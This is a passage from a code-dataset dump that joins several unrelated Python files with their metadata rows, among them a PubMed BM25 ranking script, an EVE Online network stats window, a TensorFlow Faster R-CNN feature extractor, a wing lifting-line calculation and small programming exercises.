response = messagebox.showerror("This is my Popup!", "Hello World!")
Label(root, text=response).pack()
#if response == "yes":
# Label(root, text="You Clicked Yes! ").pack()
#else:
# Label(root, text="You Clicked No! ").pack()
Button(root, text="Popup", command=popup).pack()
root.mainloop()
| [
"[email protected]"
] | |
728c81d8394209a41c9c13be78e81117b4680432 | 250e692078234b0e3ef22ad20ab7168f807d1d5f | /diagonal_matrix.py | 08b03ebc30dd750a07341d1b062de7ee30082f1c | [] | no_license | AnTznimalz/python_prepro | 694338609985971c5e6eaf8ec463c2a5c62dd836 | bdc1e49fa03704bebcf2ab69a4c1600e4cd46a74 | refs/heads/master | 2022-06-22T23:47:28.396580 | 2020-05-07T15:07:56 | 2020-05-07T15:07:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 342 | py | """ Diagonal Matrix"""
def mat():
""" Func. mat for calculate matrix """
dim = int(input())
box = list()
a, b = 0, 0
for n in range(dim):
lst = input().split()
box.append(lst)
lst = []
for i in range(dim):
a += int(box[i][i])
b += int(box[i][dim-i-1])
print(abs(a-b))
mat()
| [
"[email protected]"
] | |
fc32cea9c83b3dc402ab49fd5e934718e734f48c | 5b221c2809d82cf13a2b24a56589943315cdb381 | /2018/2018-29.py | e953d3c14398aab0d4b63f6a0705c7cf5486abfc | [] | no_license | Bruce-V/CS-BM25 | c2cd797e9be2fc55af9c8944882fd55109ebee61 | 2401f0ddb24c1712b13c0c96e13565f60d48705d | refs/heads/main | 2023-01-04T23:29:20.906427 | 2020-11-09T08:44:22 | 2020-11-09T08:44:22 | 259,228,835 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,714 | py | # Copyright 2020 zicheng Zhang([email protected])
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pymongo
import re
from math import log
myclient =pymongo.MongoClient("mongodb://localhost:27017/")
mydb = myclient["pubmed"]
mywords = mydb["freqwords3"] #pubmed中所有的词频、化学词、关键词和主题词表
mytopic=mydb["topics2018"]#pubmed中的主题词相关文献列表
mypapers=mydb["papers"]#pubmed中文献信息表
mytopicdb=myclient["cs2018_29"]
mydata=mytopicdb["cs2018_score_29"]#按词表长度改进过后的2次排序表
mycount = mytopicdb["cs2018_score_29_related"]#聚类后对应与主题相关联的文献
def sortsecond(myfreq,mydata,yuzhi):
k = 0
k1=1.2
k2=1.2
b1=0.75
b2=0.75
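    # Precomputed IDF weights, log10((N - df + 0.5) / (df + 0.5)), with hard-coded
    # document frequencies for each query term in the abstract/chemical/MeSH/keyword fields.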
idf_esophageal = log((29138919 - 32358 + 0.5) / (32358 + 0.5), 10)
idf_egfr = log((29138919 - 48503 + 0.5) / (48503 + 0.5), 10)
idf_ele_1 = log((13670358 - 0 + 0.5) / (0 + 0.5), 10)
idf_ele_2 = log((13670358 - 0 + 0.5) / (0 + 0.5), 10)
idf_ele_3 = log((13670358 - 37086 + 0.5) / (37086 + 0.5), 10)
idf_ele_4 = log((13670358 - 7893 + 0.5) / (7893 + 0.5), 10)
idf_ele_5 = log((13670358 - 0 + 0.5) / (0 + 0.5), 10)
idf_eleM_1 = log((25389659 - 46906 + 0.5) / (46906 + 0.5), 10)
idf_eleM_2 = log((25389659 - 9290 + 0.5) / (9290+ 0.5), 10)
idf_eleM_3 = log((25389659 - 0 + 0.5) / (0 + 0.5), 10)
idf_eleM_4 = log((25389659 - 0 + 0.5) / (0 + 0.5), 10)
idf_eleM_5 = log((25389659 - 17437618 + 0.5) / (17437618 + 0.5), 10)
idf_eleM_6 = log((25389659 - 8002162 + 0.5) / (8002162 + 0.5), 10)
idf_eleM_7 = log((25389659 - 2842020 + 0.5) / (2842020 + 0.5), 10)
idf_eleM_8 = log((25389659 - 0 + 0.5) / (0 + 0.5), 10)
idf_eleM_9 = log((25389659 - 4785026 + 0.5) / (4785026 + 0.5), 10)
idf_eleK_1 = log((5435471 - 13963 + 0.5) / (13963 + 0.5), 10)
idf_eleK_2 = log((5435471 - 6390 + 0.5) / (6390 + 0.5), 10)
idf_eleK_3 = log((5435471 - 0 + 0.5) / (0 + 0.5), 10)
for x in myfreq.find({}, {'PMID', 'wordfreq', 'ChemicalNameList', 'MeshHeadingNameList', 'KeywordsList'},
no_cursor_timeout=True):
ss1 = 0
ss2 = 0
ss4 = 0
gx = 0
gx1 = 0
gx2 = 0
gx3 = 0
gx4=0
len_freq=0
esophageal_score=0
egfr_score = 0
if int(x['PMID']) <= 27868941:
            cop = re.compile("[^\u4e00-\u9fa5^a-z^A-Z^0-9]")  # match characters that are not Chinese, letters, or digits
ChemicalNameList = x['ChemicalNameList']
MeshHeadingNameList = x['MeshHeadingNameList']
KeywordsList = x['KeywordsList']
wordfreq = x['wordfreq']
esophageal = [True for x in wordfreq.items() if 'esophageal' in x]
            # --------------- abstract term counts -------------------#
for key in wordfreq:
len_freq = len_freq + wordfreq[key]
for key in wordfreq:
key1 = cop.sub('', key)
if 'esophageal' in key1:
esophageal_score = esophageal_score + wordfreq[key]
for key in wordfreq:
key1 = cop.sub('', key)
if 'egfr' == key1:
egfr_score = egfr_score + wordfreq[key]
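            # BM25-style term weight: tf*(k1+1) / (tf + k1*(b1 + (1-b1)*dl/85)),
            # where dl is the abstract length and 85 apparently plays the role of the average length.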
bm25_esophageal_score = (((k1+1)*esophageal_score)/((k1*(b1+(1-b1)*(len_freq/85)))+esophageal_score))
bm25_egfr_score = (((k1 + 1) * egfr_score) / ((k1 * (b1 + (1 - b1) * (len_freq / 85))) + egfr_score))
bm25_ab_score =idf_esophageal*bm25_esophageal_score+idf_egfr*bm25_egfr_score
idf_para=[{str(esophageal_score):idf_esophageal},{str(egfr_score):idf_egfr}]
            # --------------- co-occurrence check: abstract -------------------#
if len(esophageal) != 0 and esophageal[0]:
for key in wordfreq:
key = cop.sub('', key)
if 'egfr' == key:
gx = idf_egfr
            # --------------- co-occurrence check: chemical list -------------------#
if len(esophageal) != 0 and esophageal[0]:
for ele in ChemicalNameList:
if 'EGFR' in ele['NameOfSubstance']:
gx = idf_egfr
break
            # --------------- co-occurrence check: keywords -------------------#
if len(esophageal) != 0 and esophageal[0]:
for eleK in KeywordsList:
if 'egfr' in str(eleK).lower():
gx = idf_egfr
break
            # --------------- co-occurrence check: MeSH headings -------------------#
if len(esophageal) != 0 and esophageal[0]:
for eleM in MeshHeadingNameList:
if 'EGFR' in eleM['MeshHeadingName']:
gx = idf_egfr
break
for ele in ChemicalNameList:
if 'Esophageal Neoplasms' == ele['NameOfSubstance']:
ss1 = ss1 + idf_ele_1
break
for ele in ChemicalNameList:
if 'Rare Diseases' == ele['NameOfSubstance']:
ss1 = ss1 + idf_ele_2
break
for ele in ChemicalNameList:
if 'ErbB Receptors' == ele['NameOfSubstance']:
ss1 = ss1 + idf_ele_3
break
for ele in ChemicalNameList:
if 'EGFR' == ele['NameOfSubstance']:
ss1 = ss1 + idf_ele_4
break
for eleM in MeshHeadingNameList:
if 'Esophageal Neoplasms' == eleM['MeshHeadingName']:
ss2 = ss2 + idf_eleM_1
break
for eleM in MeshHeadingNameList:
if 'Rare Diseases' == eleM['MeshHeadingName']:
ss2 = ss2 + idf_eleM_2
break
for eleM in MeshHeadingNameList:
if 'EGFR' == eleM['MeshHeadingName']:
ss2 = ss2 + idf_eleM_3
break
for eleM in MeshHeadingNameList:
if 'ErbB Receptors' == eleM['MeshHeadingName']:
ss2 = ss2 + idf_eleM_4
break
for eleM in MeshHeadingNameList:
if re.findall(r'(Human|Humans)', eleM['MeshHeadingName']):
ss2 = ss2 + idf_eleM_5
break
for eleM in MeshHeadingNameList:
if 'Male' in eleM['MeshHeadingName']:
ss2 = ss2 + idf_eleM_6
break
for eleM in MeshHeadingNameList:
if 'Aged' == eleM['MeshHeadingName']:
ss2 = ss2 + idf_eleM_7
break
for eleM in MeshHeadingNameList:
if re.findall(r'(Adult|Adults)', eleM['MeshHeadingName']):
ss2 = ss2 + idf_eleM_9
break
for eleK in KeywordsList:
if 'esophageal' in str(eleK).lower():
ss4 = ss4 + idf_eleK_1
break
for eleK in KeywordsList:
if 'egfr' in str(eleK).lower():
ss4 = ss4 + idf_eleK_2
break
total_gx=gx1+gx2+gx3+gx+gx4
cmk_len=len(ChemicalNameList) + len(MeshHeadingNameList) + len(KeywordsList)
bm25_cmk_len=ss1 + ss2 + ss4
bm25_cmk_score = (((k2 + 1) * bm25_cmk_len) / ((k2 * (b2 + (1 - b2) * (cmk_len / 13))) + bm25_cmk_len))
bm25_score=bm25_ab_score+bm25_cmk_score+total_gx
if(bm25_score>yuzhi):
mydict = {"PMID": x['PMID'],"ab_score":bm25_ab_score,"idf_para":idf_para,
"cmk_len":cmk_len,"cmk_freq":bm25_cmk_len,"bm25_cmk_score":bm25_cmk_score,"gx":total_gx,"bm25_score":bm25_score,
"ChemicalNameList":x['ChemicalNameList'],"MeshHeadingNameList":x['MeshHeadingNameList'],"KeywordsList":x['KeywordsList']}
y = mydata.insert_one(mydict)
k=k+1
print(str(y) + '---------' + str(k))
def count(mysort,mycount,topic):
for x in mysort.find({}, {'PMID', 'ab_score','idf_para', 'cmk_len', 'cmk_freq', 'bm25_cmk_score','gx','bm25_score',
'ChemicalNameList', 'MeshHeadingNameList', 'KeywordsList'}):
kk = 0
for y in mytopic.find({"topic": topic}, {'PMID', 'relate'}):
if x['PMID'] == y['PMID']:
mydict = {"PMID": x['PMID'], "related": y['relate'], "ab_score":x["ab_score"],"idf_para":x['idf_para'],
"cmk_len": x['cmk_len'], "cmk_freq": x['cmk_freq'],'bm25_cmk_score':x['bm25_cmk_score'],'gx':x['gx'],
"bm25_score": x['bm25_score'],
"ChemicalNameList": x['ChemicalNameList'], "MeshHeadingNameList": x['MeshHeadingNameList'],
"KeywordsList": x['KeywordsList']}
ss = mycount.insert_one(mydict)
print(ss)
kk = kk + 1
if (kk == 0):
mydict = {"PMID": x['PMID'], "related": -1, "ab_score": x["ab_score"], "idf_para": x['idf_para'],
"cmk_len": x['cmk_len'], "cmk_freq": x['cmk_freq'], 'bm25_cmk_score': x['bm25_cmk_score'],
'gx': x['gx'],
"bm25_score": x['bm25_score'],
"ChemicalNameList": x['ChemicalNameList'], "MeshHeadingNameList": x['MeshHeadingNameList'],
"KeywordsList": x['KeywordsList']}
ss = mycount.insert_one(mydict)
print(ss)
if __name__ == '__main__':
sortsecond(mywords,mydata,7)
count(mydata,mycount,"29")
| [
"[email protected]"
] | |
2beb1f616a83a5c13a520bc827faceffac12cedc | 5864e86954a221d52d4fa83a607c71bacf201c5a | /eve/devtools/script/networkdatamonitor.py | ad91d9153d462512bd7775ae06745daf165a0b2d | [] | no_license | connoryang/1v1dec | e9a2303a01e5a26bf14159112b112be81a6560fd | 404f2cebf13b311e754d45206008918881496370 | refs/heads/master | 2021-05-04T02:34:59.627529 | 2016-10-19T08:56:26 | 2016-10-19T08:56:26 | 71,334,417 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,749 | py | #Embedded file name: e:\jenkins\workspace\client_SERENITY\branches\release\SERENITY\eve\devtools\script\networkdatamonitor.py
import operator
import carbonui.const as uiconst
from carbonui.primitives.container import Container
from eve.client.script.ui.control.buttons import Button
from eve.client.script.ui.control.eveLabel import Label
from eve.client.script.ui.control.eveWindow import Window
import log
import uthread2
import util
PROPS = [('Packets out', 'packets_out', 0),
('Packets in', 'packets_in', 0),
('Kilobytes out', 'bytes_out', 1),
('Kilobytes in', 'bytes_in', 1)]
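# Each entry is (row label, connection-stat key, kilobyte flag); a flag of 1 makes
# the monitor divide the raw byte count by 1024 before display.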
class NetworkDataMonitor(Window):
default_caption = 'Network Data Monitor'
default_windowID = 'networkdatamonitor'
default_minSize = (400, 300)
refreshDelay = 0.5
def ApplyAttributes(self, attributes):
self._ready = False
Window.ApplyAttributes(self, attributes)
self.Reset()
self.SetTopparentHeight(4)
self.settingsContainer = Container(parent=self.sr.main, align=uiconst.TOBOTTOM, height=16, padding=8)
Button(parent=self.settingsContainer, label='Reset', align=uiconst.CENTER, func=self.Reset)
container = Container(parent=self.sr.main, align=uiconst.TOALL, padding=8)
statusHeader = ' '
for tme in self.intvals:
statusHeader += '<t><right>%s' % util.FmtDate(long(tme * 10000), 'ss')
statusHeader += '<t><right>total'
self.statusLabels = []
txt = Label(parent=container, align=uiconst.TOPLEFT, text=statusHeader, tabs=[80,
130,
180,
230,
280,
330,
380], state=uiconst.UI_DISABLED)
for i in xrange(7):
statusLabel = Label(parent=container, text='', top=(i + 1) * txt.height + 1, align=uiconst.TOPLEFT, tabs=[80,
130,
180,
230,
280,
330,
380], state=uiconst.UI_DISABLED)
self.statusLabels.append(statusLabel)
self.PopulateLabels()
uthread2.StartTasklet(self.Refresh)
def Reset(self, *args):
self.intvals = [5000,
10000,
15000,
30000,
60000]
self.counter = [[],
[],
[],
[],
[],
[]]
self.ticker = 0
self.packets_outTotal = 0
self.packets_inTotal = 0
self.bytes_outTotal = 0
self.bytes_inTotal = 0
self.laststats = {}
self.lastresetstats = sm.GetService('machoNet').GetConnectionProperties()
def Refresh(self):
while not self.destroyed:
uthread2.Sleep(self.refreshDelay)
self.PopulateLabels()
def PopulateLabels(self, *args):
self.ticker += self.intvals[0]
if self.ticker > self.intvals[-1]:
self.ticker = self.intvals[0]
stats = sm.GetService('machoNet').GetConnectionProperties()
if self.laststats == {}:
self.laststats = stats
if self.lastresetstats != {}:
for key in stats.iterkeys():
stats[key] = stats[key] - self.lastresetstats[key]
for i in xrange(len(self.counter) - 1):
self.counter[i].append([ stats[key] - self.laststats[key] for header, key, K in PROPS ])
self.counter[i] = self.counter[i][-(self.intvals[i] / 1000):]
self.counter[-1].append([ stats[key] - self.laststats[key] for header, key, K in PROPS ])
if not self.display:
self.laststats = stats
return
valueIdx = 0
for header, key, K in PROPS:
statusstr = '%s' % header
for intvals in self.counter:
value = reduce(operator.add, [ intval[valueIdx] for intval in intvals ], 0)
if not value:
statusstr += '<t><right>-'
else:
statusstr += '<t><right>%s' % [value, '%.1f' % (value / 1024.0)][K]
self.statusLabels[valueIdx].text = statusstr
valueIdx += 1
self.statusLabels[valueIdx].text = 'Outstanding<t><right>%s' % stats['calls_outstanding']
valueIdx += 1
self.statusLabels[valueIdx].text = 'Blocking Calls<t><right>%s' % stats['blocking_calls']
valueIdx += 1
block_time = stats['blocking_call_times']
if block_time >= 0:
secs = util.SecsFromBlueTimeDelta(block_time)
self.statusLabels[valueIdx].text = 'Blocking time<t><right>%sH<t><right>%sM<t><right>%sS' % util.HoursMinsSecsFromSecs(secs)
elif not hasattr(self, 'warnedBlockingTimeNegative'):
self.warnedBlockingTimeNegative = True
log.LogTraceback('Blocking time is negative?')
self.laststats = stats
| [
"[email protected]"
] | |
11297a63b6c776b7bc4dd49d2b1fa0ad4699fc53 | f8d3f814067415485bb439d7fe92dc2bbe22a048 | /models/research/object_detection/models/faster_rcnn_inception_v2_feature_extractor.py | 60e98f2b2ba3619347c6f61da69b7f71c6f59039 | [
"Apache-2.0"
] | permissive | gmonkman/python | 2f9ab8f159c01f6235c86cb0cd52062cd3fdedd3 | 9123aa6baf538b662143b9098d963d55165e8409 | refs/heads/master | 2023-04-09T15:53:29.746676 | 2022-11-26T20:35:21 | 2022-11-26T20:35:21 | 60,254,898 | 0 | 2 | null | 2023-03-24T22:58:39 | 2016-06-02T10:25:27 | Python | UTF-8 | Python | false | false | 12,152 | py | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Inception V2 Faster R-CNN implementation.
See "Rethinking the Inception Architecture for Computer Vision"
https://arxiv.org/abs/1512.00567
"""
import tensorflow as tf
from object_detection.meta_architectures import faster_rcnn_meta_arch
from slim.nets import inception_v2
slim = tf.contrib.slim
def _batch_norm_arg_scope(list_ops,
use_batch_norm=True,
batch_norm_decay=0.9997,
batch_norm_epsilon=0.001,
batch_norm_scale=False,
train_batch_norm=False):
"""Slim arg scope for InceptionV2 batch norm."""
if use_batch_norm:
batch_norm_params = {
'is_training': train_batch_norm,
'scale': batch_norm_scale,
'decay': batch_norm_decay,
'epsilon': batch_norm_epsilon
}
normalizer_fn = slim.batch_norm
else:
normalizer_fn = None
batch_norm_params = None
return slim.arg_scope(list_ops,
normalizer_fn=normalizer_fn,
normalizer_params=batch_norm_params)
class FasterRCNNInceptionV2FeatureExtractor(
faster_rcnn_meta_arch.FasterRCNNFeatureExtractor):
"""Faster R-CNN Inception V2 feature extractor implementation."""
def __init__(self,
is_training,
first_stage_features_stride,
batch_norm_trainable=False,
reuse_weights=None,
weight_decay=0.0,
depth_multiplier=1.0,
min_depth=16):
"""Constructor.
Args:
is_training: See base class.
first_stage_features_stride: See base class.
batch_norm_trainable: See base class.
reuse_weights: See base class.
weight_decay: See base class.
depth_multiplier: float depth multiplier for feature extractor.
min_depth: minimum feature extractor depth.
Raises:
ValueError: If `first_stage_features_stride` is not 8 or 16.
"""
if first_stage_features_stride != 8 and first_stage_features_stride != 16:
raise ValueError('`first_stage_features_stride` must be 8 or 16.')
self._depth_multiplier = depth_multiplier
self._min_depth = min_depth
super(FasterRCNNInceptionV2FeatureExtractor, self).__init__(
is_training, first_stage_features_stride, batch_norm_trainable,
reuse_weights, weight_decay)
def preprocess(self, resized_inputs):
"""Faster R-CNN Inception V2 preprocessing.
Maps pixel values to the range [-1, 1].
Args:
resized_inputs: a [batch, height, width, channels] float tensor
representing a batch of images.
Returns:
preprocessed_inputs: a [batch, height, width, channels] float tensor
representing a batch of images.
"""
return (2.0 / 255.0) * resized_inputs - 1.0
def _extract_proposal_features(self, preprocessed_inputs, scope):
"""Extracts first stage RPN features.
Args:
preprocessed_inputs: A [batch, height, width, channels] float32 tensor
representing a batch of images.
scope: A scope name.
Returns:
rpn_feature_map: A tensor with shape [batch, height, width, depth]
activations: A dictionary mapping feature extractor tensor names to
tensors
Raises:
InvalidArgumentError: If the spatial size of `preprocessed_inputs`
(height or width) is less than 33.
ValueError: If the created network is missing the required activation.
"""
preprocessed_inputs.get_shape().assert_has_rank(4)
shape_assert = tf.Assert(
tf.logical_and(tf.greater_equal(tf.shape(preprocessed_inputs)[1], 33),
tf.greater_equal(tf.shape(preprocessed_inputs)[2], 33)),
['image size must at least be 33 in both height and width.'])
with tf.control_dependencies([shape_assert]):
with tf.variable_scope('InceptionV2',
reuse=self._reuse_weights) as scope:
with _batch_norm_arg_scope([slim.conv2d, slim.separable_conv2d],
batch_norm_scale=True,
train_batch_norm=self._train_batch_norm):
_, activations = inception_v2.inception_v2_base(
preprocessed_inputs,
final_endpoint='Mixed_4e',
min_depth=self._min_depth,
depth_multiplier=self._depth_multiplier,
scope=scope)
return activations['Mixed_4e'], activations
def _extract_box_classifier_features(self, proposal_feature_maps, scope):
"""Extracts second stage box classifier features.
Args:
proposal_feature_maps: A 4-D float tensor with shape
[batch_size * self.max_num_proposals, crop_height, crop_width, depth]
representing the feature map cropped to each proposal.
scope: A scope name (unused).
Returns:
proposal_classifier_features: A 4-D float tensor with shape
[batch_size * self.max_num_proposals, height, width, depth]
representing box classifier features for each proposal.
"""
net = proposal_feature_maps
depth = lambda d: max(int(d * self._depth_multiplier), self._min_depth)
trunc_normal = lambda stddev: tf.truncated_normal_initializer(0.0, stddev)
data_format = 'NHWC'
concat_dim = 3 if data_format == 'NHWC' else 1
with tf.variable_scope('InceptionV2', reuse=self._reuse_weights):
with slim.arg_scope(
[slim.conv2d, slim.max_pool2d, slim.avg_pool2d],
stride=1,
padding='SAME',
data_format=data_format):
with _batch_norm_arg_scope([slim.conv2d, slim.separable_conv2d],
batch_norm_scale=True,
train_batch_norm=self._train_batch_norm):
with tf.variable_scope('Mixed_5a'):
with tf.variable_scope('Branch_0'):
branch_0 = slim.conv2d(
net, depth(128), [1, 1],
weights_initializer=trunc_normal(0.09),
scope='Conv2d_0a_1x1')
branch_0 = slim.conv2d(branch_0, depth(192), [3, 3], stride=2,
scope='Conv2d_1a_3x3')
with tf.variable_scope('Branch_1'):
branch_1 = slim.conv2d(
net, depth(192), [1, 1],
weights_initializer=trunc_normal(0.09),
scope='Conv2d_0a_1x1')
branch_1 = slim.conv2d(branch_1, depth(256), [3, 3],
scope='Conv2d_0b_3x3')
branch_1 = slim.conv2d(branch_1, depth(256), [3, 3], stride=2,
scope='Conv2d_1a_3x3')
with tf.variable_scope('Branch_2'):
branch_2 = slim.max_pool2d(net, [3, 3], stride=2,
scope='MaxPool_1a_3x3')
net = tf.concat([branch_0, branch_1, branch_2], concat_dim)
with tf.variable_scope('Mixed_5b'):
with tf.variable_scope('Branch_0'):
branch_0 = slim.conv2d(net, depth(352), [1, 1],
scope='Conv2d_0a_1x1')
with tf.variable_scope('Branch_1'):
branch_1 = slim.conv2d(
net, depth(192), [1, 1],
weights_initializer=trunc_normal(0.09),
scope='Conv2d_0a_1x1')
branch_1 = slim.conv2d(branch_1, depth(320), [3, 3],
scope='Conv2d_0b_3x3')
with tf.variable_scope('Branch_2'):
branch_2 = slim.conv2d(
net, depth(160), [1, 1],
weights_initializer=trunc_normal(0.09),
scope='Conv2d_0a_1x1')
branch_2 = slim.conv2d(branch_2, depth(224), [3, 3],
scope='Conv2d_0b_3x3')
branch_2 = slim.conv2d(branch_2, depth(224), [3, 3],
scope='Conv2d_0c_3x3')
with tf.variable_scope('Branch_3'):
branch_3 = slim.avg_pool2d(net, [3, 3], scope='AvgPool_0a_3x3')
branch_3 = slim.conv2d(
branch_3, depth(128), [1, 1],
weights_initializer=trunc_normal(0.1),
scope='Conv2d_0b_1x1')
net = tf.concat([branch_0, branch_1, branch_2, branch_3],
concat_dim)
with tf.variable_scope('Mixed_5c'):
with tf.variable_scope('Branch_0'):
branch_0 = slim.conv2d(net, depth(352), [1, 1],
scope='Conv2d_0a_1x1')
with tf.variable_scope('Branch_1'):
branch_1 = slim.conv2d(
net, depth(192), [1, 1],
weights_initializer=trunc_normal(0.09),
scope='Conv2d_0a_1x1')
branch_1 = slim.conv2d(branch_1, depth(320), [3, 3],
scope='Conv2d_0b_3x3')
with tf.variable_scope('Branch_2'):
branch_2 = slim.conv2d(
net, depth(192), [1, 1],
weights_initializer=trunc_normal(0.09),
scope='Conv2d_0a_1x1')
branch_2 = slim.conv2d(branch_2, depth(224), [3, 3],
scope='Conv2d_0b_3x3')
branch_2 = slim.conv2d(branch_2, depth(224), [3, 3],
scope='Conv2d_0c_3x3')
with tf.variable_scope('Branch_3'):
branch_3 = slim.max_pool2d(net, [3, 3], scope='MaxPool_0a_3x3')
branch_3 = slim.conv2d(
branch_3, depth(128), [1, 1],
weights_initializer=trunc_normal(0.1),
scope='Conv2d_0b_1x1')
proposal_classifier_features = tf.concat(
[branch_0, branch_1, branch_2, branch_3], concat_dim)
return proposal_classifier_features
| [
"[email protected]"
] | |
3e3fa24bb242e68bd2148c3982eaedf610738f1e | 8fa938eddcc75eb7dff1f2055c49cb3817a00c63 | /Basic - Part1/ex124.py | a5b7b3c3bf10bb3195275eca92ec3fbbf51c9665 | [] | no_license | jayhebe/w3resource_exercises | f27109759d112b0611574aa70eb378ace447c2a0 | b29aa7c806f6021a8988e83bb9f674522a41380d | refs/heads/master | 2020-05-07T09:23:24.039271 | 2020-01-30T15:05:06 | 2020-01-30T15:05:06 | 180,374,062 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 78 | py | x = 1
y = 1
z = 1
if x == y == z:
print("All variables have same value!")
| [
"[email protected]"
] | |
3b5330ea0aa6a4a8d96e5804f4c85d8878f67ed5 | d5440edcfc66496937e98c557ab9c33946234808 | /lifting line theory basic.py | 750e9c9edd03ecebdd25e481ebf6dc7a98950762 | [] | no_license | geoffreynyaga/lifting-line-theory | 4df7fb1baca79b9e3dfb19f5ec6c4ba86fa8fe69 | 352e1379863adf25c5f3e4966e16ae67d38f97ba | refs/heads/master | 2022-08-30T04:18:23.725361 | 2020-02-14T18:55:28 | 2020-02-14T18:55:28 | 99,334,542 | 2 | 0 | null | 2022-06-22T01:09:44 | 2017-08-04T10:58:33 | Python | UTF-8 | Python | false | false | 2,355 | py | # coding: utf-8
__author__ = "Geoffrey Nyaga"
import numpy as np # type: ignore
import math
import matplotlib.pylab as plt # type: ignore
N: int = 9 # (number of segments - 1)
S: float = 24.39 # wing area m^2
AR: float = 7.8 # Aspect ratio
taper: float = 0.45 # Taper ratio
alpha_twist: float = -2.0 # Twist angle (deg)
i_w: float = 1.0 # wing setting angle (deg)
a_2d: float = 6.8754 # lift curve slope (1/rad)
alpha_0: float = -4.2 # zero-lift angle of attack (deg)
b = math.sqrt(AR * S) # wing span (m)
MAC = S / b # Mean Aerodynamic Chord (m)
Croot = (1.5 * (1 + taper) * MAC) / (1 + taper + taper ** 2) # root chord (m)
# theta = np.arange(math.pi/(2*N), math.pi/2, math.pi/(2*(N)))
theta = np.linspace((math.pi / (2 * N)), (math.pi / 2), N, endpoint=True)
# alpha =np.arange(i_w+alpha_twist,i_w ,-alpha_twist/(N))
alpha = np.linspace(i_w + alpha_twist, i_w, N)
z = (b / 2) * np.cos(theta)
c = Croot * (1 - (1 - taper) * np.cos(theta))  # local chord at each spanwise station (m)
mu = c * a_2d / (4 * b)
LHS = mu * (np.array(alpha) - alpha_0) / 57.3 # .reshape((N-1),1)# Left Hand Side
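# Prandtl lifting-line (monoplane) equation: build and solve the linear system for
# the odd Fourier coefficients of the circulation distribution at the N stations.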
RHS = []
for i in range(1, 2 * N + 1, 2):
RHS_iter = np.sin(i * theta) * (
1 + (mu * i) / (np.sin(list(theta)))
) # .reshape(1,N)
# print(RHS_iter,"RHS_iter shape")
RHS.append(RHS_iter)
test = np.asarray(RHS)
x = np.transpose(test)
inv_RHS = np.linalg.inv(x)
ans = np.matmul(inv_RHS, LHS)
mynum = np.divide((4 * b), c)
test = (np.sin((1) * theta)) * ans[0] * mynum
test1 = (np.sin((3) * theta)) * ans[1] * mynum
test2 = (np.sin((5) * theta)) * ans[2] * mynum
test3 = (np.sin((7) * theta)) * ans[3] * mynum
test4 = (np.sin((9) * theta)) * ans[4] * mynum
test5 = (np.sin((11) * theta)) * ans[5] * mynum
test6 = (np.sin((13) * theta)) * ans[6] * mynum
test7 = (np.sin((15) * theta)) * ans[7] * mynum
test8 = (np.sin((17) * theta)) * ans[8] * mynum
CL = test + test1 + test2 + test3 + test4 + test5 + test6 + test7 + test8
CL1 = np.append(0, CL)
y_s = [b / 2, z[0], z[1], z[2], z[3], z[4], z[5], z[6], z[7], z[8]]
plt.plot(y_s, CL1, marker="o")
plt.title("Lifting Line Theory\n Elliptical Lift distribution")
plt.xlabel("Semi-span location (m)")
plt.ylabel("Lift coefficient")
plt.grid()
plt.show()
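# Overall wing lift coefficient from the first Fourier coefficient: CL = pi * AR * A1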
CL_wing = (
math.pi * AR * ans[0]
) # USE THIS CL WITH CRUISE SPEED TO CALCULATE THE ACCURATE LIFT!!!!!!!!!!
print(CL_wing, "CL_wing")
| [
"[email protected]"
] | |
ff54639667d43e2a8ef0b80917c081381a5370b5 | 5471de6fd11cc36e8ad9c05ea25d13ae568ad060 | /ClassesAndInstances/Lab Vet.py | 0661e0116a2ab4a17184311b5b09a71a094a3404 | [] | no_license | olgayordanova/PythonOOP | 75bbf9a20c612be7212de7bed59edccef1e02304 | 2d177d17bf50335b17f6246198b1cf85719de1df | refs/heads/main | 2023-03-30T18:59:56.751037 | 2021-04-03T19:48:37 | 2021-04-03T19:48:37 | 333,202,583 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,327 | py | class Vet:
animals =[]
space =5
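    # Shared class-level state: Vet.animals and Vet.space cap the total number of
    # registered animals across every clinic, while self.animals (set in __init__)
    # tracks the animals registered with this particular vet.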
def __init__(self, name):
self.name =name
self.animals = []
def register_animal(self,animal_name):
if len(Vet.animals)<Vet.space:
self.animals.append(animal_name)
Vet.animals.append ( animal_name )
return f"{animal_name} registered in the clinic"
else:
return f"Not enough space"
def unregister_animal(self, animal_name):
if animal_name in self.animals:
self.animals.remove ( animal_name )
Vet.animals.remove ( animal_name )
return f"{animal_name} unregistered successfully"
else:
return f"{animal_name} not in the clinic"
def info(self):
return f"{self.name} has {len(self.animals)} animals. {Vet.space-len(Vet.animals)} space left in clinic"
peter = Vet("Peter")
george = Vet("George")
print(peter.register_animal("Tom"))
print(george.register_animal("Cory"))
print(peter.register_animal("Fishy"))
print(peter.register_animal("Bobby"))
print(george.register_animal("Kay"))
print(george.unregister_animal("Cory"))
print(peter.register_animal("Silky"))
print(peter.unregister_animal("Molly"))
print(peter.unregister_animal("Tom"))
print(peter.info())
print(george.info())
| [
"[email protected]"
] | |
